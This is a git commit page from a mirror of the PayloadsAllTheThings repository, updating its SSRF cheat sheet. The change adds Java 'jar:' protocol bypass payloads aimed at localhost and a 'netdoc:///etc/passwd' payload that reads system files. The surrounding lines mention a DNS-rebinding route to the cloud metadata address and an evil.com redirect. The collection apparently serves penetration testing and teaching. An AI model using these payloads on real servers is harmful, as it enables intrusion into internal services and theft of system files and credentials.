daffainfo
/
PayloadsAllTheThings
mirror of https://github.com/daffainfo/PayloadsAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

update SSRF/README.md with java payloads

patch-1
security-is-myth 2020-11-07 22:03:02 +05:30
parent bd184487e5
commit 08bc3acb05
1 changed files with 11 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
Server Side Request Forgery/README.md
View File

@ -247,6 +247,15 @@ For example to rotate between 1.2.3.4 and 169.254-169.254, use the following dom
make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms
``` ```
### Bypassing using jar protocol (java only)
```powershell
jar:scheme://domain/path!/
jar:http://127.0.0.1!/
jar:https://127.0.0.1!/
jar:ftp://127.0.0.1!/
```
## SSRF exploitation via URL Scheme ## SSRF exploitation via URL Scheme
### File ### File
@ -374,8 +383,8 @@ Content of evil.com/redirect.php:
Wrapper for Java when your payloads struggle with "\n" and "\r" characters. Wrapper for Java when your payloads struggle with "\n" and "\r" characters.
```powershell ```powershell
ssrf.php?url=gopher://127.0.0.1:4242/DATA ssrf.php?url=netdoc:///etc/passwd
``` ```
## SSRF exploiting WSGI ## SSRF exploiting WSGI